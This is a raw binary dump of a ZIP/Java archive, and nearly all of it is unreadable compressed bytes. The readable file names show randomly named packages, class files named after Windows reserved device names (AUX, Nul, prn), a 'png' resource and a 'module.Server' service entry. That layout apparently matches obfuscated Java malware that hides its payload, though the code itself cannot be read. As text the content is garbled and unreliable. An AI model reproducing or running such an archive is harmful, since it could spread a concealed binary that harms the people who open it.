PK
     sq�H            	  META-INF/��  PK
     sq�H               _019_/PK
     sq�H               qvdRxACxKZUHyTP/PK
     sq�H               qvdRxACxKZUHyTP/CWTsgGNclSjdi/PK
    sq�H�j��      _019_/a.png        �      ��s���b``���p	� ��$��� R,�N�!@PÑ��sxD30p} aF�5&3��2%�%��i%�E��)�I�
n�E���E��
���3��1Չ��9�&�d��)�d�2���8|�&R��c�����2H�"���ƾ� 19;�D!)5=3�VIAAAI!3�V)������95#ӣ�(5��/$�*;�2E�ގ˦�
�97�$Q�"7'�ت�V	l���WR +)ɶU��:�7@�9�(U�D�P7���D��L������LG!8�D�+1O��\��� HYZ�*@����)JI�
rq��	��*e��X�뗗������ZZZ���U�W�$V��+C���Z�\�Y /?1)���VI�K	@=�X �(�x�`�J����M��D~QH~~��H��GW�M������Y�XZD!�(B���V����������I,\���� KI��WAiQ8ZR��SsRsS�J��af�f)�Vi�E��%v�����y�6�A��0Y��ӥ��h��%_�_000�y�8�xt�vЯ�A�m�jOݸ&ۊ�������|��\��jH��(	~���Ӻ&�4�������vl�6���3��RS�m�8s�$��ݳmf����Ss��{C��J�Bi�.�1ux�0kܲ�I�w�	*lBS]'���u7Y�)��2�=p¾�k��<U�'�˞��qF�e��*1&�m]�_jsMZv���M��s�׋"��	O?pf���/�4�Y����+##-����sC@ǚ��=Q�W��1����u�")Z/v0�5V{>5����Q8d��}�ψ�~�)<1qIp�O�-�E�O��ܹD8����فU�|�~��ӑ]빲��������|?�y~J�lVۿܟ,#����R,�<]�\�9%4 PK
    sq�HH�2  �  '  qvdRxACxKZUHyTP/CWTsgGNclSjdi/AUX.class  �      2      ��MO�@�w,PDP�O�&\�K�҃�4ޖRK��ƶ�Y�L<��Q�����;y&��������#4J��dc��2�.W�i�⬧�W��U$1#aI�$�	[�(1K(��q�����!��O������JBՏ��D��#5VN�����|/�=��> ��J��|?��3WO�M�C�0�"����43�I��l�����;�|잿un���gW^t7�N��pLh���`z�j�ȁ?#Әz�p��i���0<Ǯ���ϳ���U�������C��"w�\I���.��g����r�/PK
    sq�HZ����  �  '  qvdRxACxKZUHyTP/CWTsgGNclSjdi/Aux.class  �      �      �TKW�V�.��(JBL�(mb��ЖGS�RP!8�#��I�E�Lef�_�u�Ͳ٘���E]�G�ε0́JG��;3�|�z��AAA�
"���.)���D�+cMF�4鸎�-C(_e2�f��P1���9�F��q��4��i�)c�O9[F�NM�|i{���˵���&K�+�SIM��v���쎿��/��ml�ˆ[Lю��Q\���msdPfj���;�*㾊N(2��ǀ�O0��S��L�C<�SG���Tvc�6}�;��Z�����L�m�3�K�Ye���*��&�a��;�_bh�])�Q��]ۛ�k�d>g;���ՆGz�3��	������uE�5��-j�����Z�A���p�6�K�k����^���L�x���Ae�����J^e�������f�N�X���g�Ī?/���R͔�-��'T<���y�A%�L٨V�-��n5�4i_b�!z	���|�1�ދF��ܸ�aL|��~�b�*�0�}��J�Kէ�&c�(m[A���wHs�i�"��T|�q�1C�e�-���?��bsg�;p��y�hIf���DC�i�gX���X!$��YbxxQ��Af0.��k-�ҙ�����~�y*��U���fyy�rR�Y
�[$�zL:W�` 2�!�%tu"����5�G�n �z)����r���>t�h���]���"���v�4s���P�<қC�x� ���H��o0�����L?�,��K5�.�5�.�XO�B�S��U�\��1!��O�����oH'#B"����{R/�z�ו�k��Q2"'�g4d���h���q*����C���,�~�����M3;4s�~��U���}ī#D��3T`��H�J�S������.��ǐ��������sDrX��PK
    sq�H}���  �  '  qvdRxACxKZUHyTP/CWTsgGNclSjdi/Nul.class  �      �      ��]/A�ߣ�ݶ�W����(7��D$��A�%z#���l�fXۆ��D?��3��E	sqf���g�����;�,��@���$�U�O�d�u�{�!�[:&hya;�tAT�����NIB�u�]���-j��,�q�*����5BB�-�"����N54�D���M�`Tm�L�#E�v�w��4�@�{���Z枰�k�bW�e�]�*���Ml�;h�#n5���_RՅ�u�Yc!�󡿼]5t�@��-\5죛���^��s[:��'�kw{��k�g��}y9��51�	�̿�^�L�RI`^�����zIu�N��ʙ�_~=����l%1�i@
z"�T��O܅�ox��]O/�`�M�G���~Z�,����G���=#���b��� PK
    sq�H>��u  �  '  qvdRxACxKZUHyTP/CWTsgGNclSjdi/nUl.class  �      u      �W�_[w�޼n��J�R��:JCd}�Vm)�6[��@i`CrK!�%7�:u����g}�vj����	7��ۜ:u:���|L���<��
Z����y?~�$��<`'�� �Q���o�8�Š<+��v���]8`��A��8��n��GD��>�9Ơ_�w(�q6�><� 4'b�y��S���
����U9W��"�q/��C�XB�B�3�0�E<'� W`44��_��V����ڣ&��x��-˸�i�Zv���T}G�aE%��%���{4�װ����c,�JD�(�P�X(��^�S��� s2� �fq�a/J���J,1B����o4�$|w�tw��nq�YG��&1�bG�XBm�w0�l9��;l�N��%4�E���� ����ރSayB�)u��p�c��0����0��"��CRB
-"F$�HS�˭ذB��N�$��$�Z����'�����	�j�Q{<�Ju)j��NDD$��$���ކ���`�Kx�Ncߒ�{�t������ͫ����q%��˾99)'�S��R�9JFd�X����Q�R��Br�"��)���]U��6�W4m?���r_o�b�-1N�f=O��\#���Z�F���*ƨ�w/�%��_��τ5���*�Ȁ���:��l�W�)�?*�qJhL>u$)���:��r(E�)L�s�.@�T&�bAZґ�M�W��	�w���+�I�r�,������c��P�,U�k��Ud���2ͩ��+��P�ը�
��އ	Z�kh�����8��D��(���s?B7K�d.a�{�"��D�.��1|�m?̠����Ĉ�k�p�8��$F8J���k��i\d�g��ۍU�Y�|Nķ� ˟Y7����c�a�%rW���1n9KX�8�0�Ҙ�[�MF�N��O�5�w�T�_{oj�PW8�3��&�	ޜ�K&��,9LO��%d�W�x^����
�Ġ�8���A�{�Oo��f��:	_�n	_�.[�vܖ���wCJ�ۡ�ͽ��u�ߥTj�x^�8RQ�����;n�嫷㇄D��29k��1�fϮz�?�27��H��t��M�}U�v�����l�cǯ��;~K/�=	�j�i�n�I��[��t�LU7�/t�SM���݆�Dz	[�-v�7K����9�Z��JGoב$J�DE��;���3�KC-�k�M��*���B��7UP?���f��Yx�"������C��/b-W:h+X�&����^��(��B��8��\�d�'�t'$�E�oї��œ_^�j����z�^ݫ��6���j�G)�٫9{0��p8�w_��
�;�_� 1��"U�P�a)ix%�Ť������e�!�������1�=R�.�T�y� �<=/��CO=��yaS�A� ��:�;��u�̰�u������A�b�*fQ��U��T?T�����T6���{���7��,6g��\A��wE�(2�x�*_4�g4ܒ���/U^�ɿ��J!!�|M&���k�Y��?N�ߋ�m��/d���˟�詾���YO�:/�Hí:Z���j}��ݦ��йt�5�|G`&0��!�,������p_��B��Ç����xw����R�x˭2fu73����=73�������>�x=u�,�9��`��[���s���w͐�:Tҏ��GC!E>��F���SY	�􂓧ɵ��s8��,Y~���Zvj8�Ň�4|�L༆O5|��ڧ-�)��ô�H��V��!Kd���Q<�h
�6Z��l�՗[<���<�{�������s}� ���r��Z�!�Ӧ��-�/���.�?���`}�b�v�>f)�VZ������s���s�� PK
    sq�H��  �  '  qvdRxACxKZUHyTP/CWTsgGNclSjdi/prn.class  �            �V�W����ڛ��8j�6i��rR��r�%��&Vjǎ�ږR
k�I�d�UW+�P��B!�h��(!���D������_A�y�e�g>��μ��f�w�o�n���� ƿ�Љ��;����+�wt<�q�EC\Gc���:�?�8��Y|�_���1|\��aBCRCJ�б��:2�da�؇�낎C���!�tL!�q�����gY�:�����9��#���ia��e�-�,f4̱���:������'5|Jǣx��~��gX|�m���O�W����9mF,'28q^$����+x#�+̩NJ���>i�BAke�mf3Zde3���b4g�Ȱ3�xd���S�qR��!�Qӵ�	[�XМ7i�I�m��������g{�1+ky�<�
o4��]�����%�j;׭�`ei����E+9���I��ռ�)3#"݅tZ�"�7ZpL��'�\ל[�+�͒��a�O�&Eγ�,�5�T�N��^�a�,Z���Rc��p�"]鴕1���ӎ˰Xw͒�\���P�|{y�1�]c�Zv^0�\2�E����+��!�[��z�u9O�j�
v�����SۨO�)[���\d�:�-ϋ�ZM�ʏ�m��k^��|/q��4�-\6�m�������i[����{���4^�p��q����cj��Um�'LѕUj6- ��ӕ�6;N?ü���sj�펕#�������7��ۀ�&i���lد
v̸�'*3k��b���Oۅ�$_B�9���l�ge.�	�אI��9����,��3#�^�6�W���uF�Je}-I�BdG��tO�_�kM�l���mdg`����D%J���
�X��n+��s_^x]ɤ��kr���C��1'��P�^ڴi�`�)�mۨ�)�1+�����(r����p����F�-�Vf�x��Qy�����h�Y�0|G6�;7�V���r�Ya�C�e-%m'O�*j��*X�E��b�P)��(�)?��������!+�ӧ}��\e[��/O��mW5��d3����S�&�쟠�.0�%��Iӕ����LPR��N��g�zf�L<�7����Sg�����ɹ\��IEW��
�P�+�x���1p�,~��u1t�����#q��o�e�M-��
���z����k"���s����{�߬jB!��|oe@��HM8�sG��~@A/�]��ңa5_�^��*N���"�"�a͋hx{i�a��?j||�e�=��c�h��u��?�y��h�G�'�E��v��N��$�h�z ��>�݄�	�	J(V��F�"|�0n_��@���ފK�!G%�S�y���O�j*#o/�}�ָ7�ܛ��,͍�X%�J N�o�{�а5����&�����7j����uǪנ�?��b���8/��x�z����S�#e<�~�/��2�ۋ��%���"?�:�p	�����@��Uv�r�(�c�z7����2%�C3�~��*�L?B��I���wS��N�ɪ�+h��N��A�@8��=�P}�D	U֧��%htr�.�e4GMK��:.�j��͏�v����<�A�"G�`��%S����*G�/�g��wVg*�Js�h���� ���3�oz���xW��)���@8q�p�"|�v〳���8X9�_)�)Se��!m��e�g�2,�T8T�"���f�A5A*��U�x�G�X�JJ�"�k�O^��Ԭ�_��/�+��i��J�e�<�9�uH�]&^���� �:Hl�3��N�.��¹�S�l�+�?PK
     tq�H               META-INF/services/PK
    tq�HY��#   !     META-INF/services/module.Server  !       #       +,K	�pt���
��	�s)Nw�K�	�J���+� PK
     sq�H            	         �A    META-INF/��  PK
     sq�H                      �A+   _019_/PK
     sq�H                      �AO   qvdRxACxKZUHyTP/PK
     sq�H                      �A}   qvdRxACxKZUHyTP/CWTsgGNclSjdi/PK
    sq�H�j��               ���   _019_/a.pngPK
    sq�HH�2  �  '           ���  qvdRxACxKZUHyTP/CWTsgGNclSjdi/AUX.classPK
    sq�HZ����  �  '           ��.  qvdRxACxKZUHyTP/CWTsgGNclSjdi/Aux.classPK
    sq�H}���  �  '           �� 
  qvdRxACxKZUHyTP/CWTsgGNclSjdi/Nul.classPK
    sq�H>��u  �  '           ��  qvdRxACxKZUHyTP/CWTsgGNclSjdi/nUl.classPK
    sq�H��  �  '           ���  qvdRxACxKZUHyTP/CWTsgGNclSjdi/prn.classPK
     tq�H                      �AJ  META-INF/services/PK
    tq�HY��#   !              ��z  META-INF/services/module.ServerPK      h  �    